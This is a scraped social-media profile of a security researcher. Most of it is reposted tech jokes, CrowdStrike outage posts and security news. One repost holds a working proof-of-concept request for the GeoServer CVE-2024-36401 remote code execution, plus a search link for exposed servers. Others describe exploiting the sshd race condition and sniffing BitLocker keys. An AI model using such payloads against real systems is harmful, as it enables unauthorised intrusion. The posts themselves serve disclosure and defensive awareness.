@Nightbanes Profile picture

Nightbane / Matt Keeley

@Nightbanes

Founder of ProDefense | Nerd who likes breaking web applications. | ex @bishopfox

Similar User
MD Sagor Hossain (Professor) 🇧🇩 photo

@bughuntar

HACKLIDO photo

@hacklido

Het Mehta photo

@hetmehtaa

Linuxopsys photo

@linuxopsys

☾.*·̩͙Yukito🐾 photo

@444Yuki19

AdGuard en Français photo

@AdguardFr

Termux Devs photo

@termuxdevs

Nithin 🦹‍♂️ photo

@thebinarybot

HackerSploit photo

@HackerSploit

David Bombal photo

@davidbombal

John Hammond photo

@_JohnHammond

Clint Gibler photo

@clintgibler

🇷🇴 cristi photo

@CristiVlad25

✞ inversecos photo

@inversecos

payloadartist photo

@payloadartist

Nightbane / Matt Keeley Reposted
Tweet Image 1

Nightbane / Matt Keeley Reposted

New from 404 Media: police freaking out at iPhones stored for forensic examination mysteriously rebooting themselves. This makes brute forcing much harder. Cops hypothesize Apple pushed an update that tells nearby iPhones to reboot if not on phone network 404media.co/police-freak-o…


Nightbane / Matt Keeley Reposted

ever since i was young i dreamed of creating shareholder value via ai powered operating systems for the modern enterprise cloud


Nightbane / Matt Keeley Reposted

Uber moves to MySQL 8.0, reducing 94% of the lock time. Thanks to MySQL 8's new B+Tree locking model which I talked about in another post. First time I see the payoffs of that impressive design in a production shop.

Tweet Image 1
Tweet Image 2

Nightbane / Matt Keeley Reposted

A girl was scammed out of $1000 when she scanned a QR code for parking, but it turned out to be a fake sticker 😬

From lozzyloz

Nightbane / Matt Keeley Reposted

For beginners and professionals, OS-Surveillance offers AI-powered satellite image analysis. Simply zoom in and put marker on the location you want to research, and the AI will do the rest. Best of all, it's free for everyone. Register now and try it on os-surveillance.io


Nightbane / Matt Keeley Reposted

Bird-shaped drone used by the Marines.

From Conflict

Nightbane / Matt Keeley Reposted

Dependency is replaced by one-liner, weekly traffic is reduced by 440GB

Tweet Image 1

Nightbane / Matt Keeley Reposted

This year's Crowdstrike booth at Blackhat:

Tweet Image 1

Nightbane / Matt Keeley Reposted

Just released SquatSquasher: Automated detection of typosquatting domains! - Generates domain variations - Checks registration status - Analyses suspicious domains - Bulk domain checking Born from a work project, now available for all. Check it out: github.com/Stuub/SquatSqu…

Tweet Image 1
Tweet Image 2
Tweet Image 3

Nightbane / Matt Keeley Reposted

This strange tweet got >25k retweets. The author sounds confident, and he uses lots of hex and jargon. There are red flags though... like what's up with the DEI stuff, and who says "stack trace dump"? Let's take a closer look... 🧵1/n

Tweet Image 1

Nightbane / Matt Keeley Reposted

CloudStrike post-mortem meeting


Nightbane / Matt Keeley Reposted

Crowdstrike : its fine u just have to manually visit the PC boot it into safe mode and remove a sys file US Organization with 50,000 pcs and a completely outsourced IT department in Bangalore : what


Nightbane / Matt Keeley Reposted

Hit by @CrowdStrike and just found out you don't have the necessary BitLocker Recovery keys? We might have a solution for you 😜😇 In our two day hardware training at @BlackHatEvents we teach how to break BitLocker TPM only setups by sniffing the communication between the CPU…

Tweet Image 1
Tweet Image 2

Nightbane / Matt Keeley Reposted

Donald Trump was shot at during recent Trump rally.


Nightbane / Matt Keeley Reposted

This... Just creates a WordPress user with the name "admin"... There is no vulnerability here. This could only be an issue if the site is configured to set every new user role as an Administrator but that would be exceedingly rare and it wouldn't matter what your username is.

This post is unavailable.

Nightbane / Matt Keeley Reposted

🚨Alert🚨CVE-2024-36401 (CVSS 9.8): GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions 🔥PoC: github.com/vulhub/vulhub/… 📊6.4K+ Services are found on hunter.how 🔗Hunter Link: hunter.how/list?searchVal… 👇Search Query Hunter:…

Tweet Image 1

CVE-2024-36401 POC: GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1 Host: your-ip:8080 From: github.com/vulhub/vulhub/… #cve #poc



Nightbane / Matt Keeley Reposted

#CVE_2024_6387 Finally, if sshd cannot be updated or recompiled, this signal handler race condition can be fixed by simply setting LoginGraceTime to 0 in the configuration file. This makes sshd vulnerable to a denial of service (the exhaustion of all MaxStartups connections),…

Tweet Image 1

#CVE_2024_6387 With this change in strategy, it takes ~10,000 tries on average to win the race condition; i.e., with 100 connections (MaxStartups) accepted per 120 seconds (LoginGraceTime), it takes ~3-4 hours on average to win the race condition, and ~6-8 hours to obtain a…

Tweet Image 1


Some nice swag from @JohnDeere bug bounty program 😁

Tweet Image 1

Nightbane / Matt Keeley Reposted

🚨PoC RELEASED🚨CVE-2024-28995; Automated Path Traversal & Local File Read

Tweet Image 1
Tweet Image 2

Loading...

Something went wrong.


Something went wrong.